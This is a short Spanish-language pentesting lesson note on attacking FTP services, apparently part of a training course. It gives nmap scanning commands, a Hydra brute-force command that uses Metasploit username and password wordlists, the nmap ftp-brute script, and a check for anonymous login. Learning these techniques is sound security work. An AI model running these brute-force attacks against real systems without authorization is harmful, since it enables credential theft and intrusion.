FTP Lesson

El protocolo FTP tambien llamado Protocolo de transferencia de archivos, el mismo se utiliza para almacenar archivos.

nmap <Tarjet>
nmap <> -p21 -sV -O
ftp <Tarjet>

Para averiguar algunos nombre de usuarios y contraseñas se puede utilizar la herramienta de Hydra, la cual nos ayudara a realizar ataques de fuerza bruta.

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <Tarjet> ftp>

Tambien se puede realizar ataques de fuerza bruta utilizando nmap, pero previamiente se debe de haber identificado el usuario correspondiente.

nmap <Tarjet> --script ftp-brute --script-args userdb=/root/<Lista de usuarios> -p 21

Las configuraicon por defecto hacen que sea mas facil vulnerar la autenticacion.

nmap <Tarjet>
nmap <Tarjet> -p21 -sV
# Verificar si permite la autenticion con el usuario anonimous si el comando es exitoso, realizara un LS y el resultado se mostrara en la pantall
nmap <Tarjet> -p21 --script ftp-anon

PreviousSMB Lesson NextSSH Lesson

Last updated 9 months ago

FTP Anonymous Login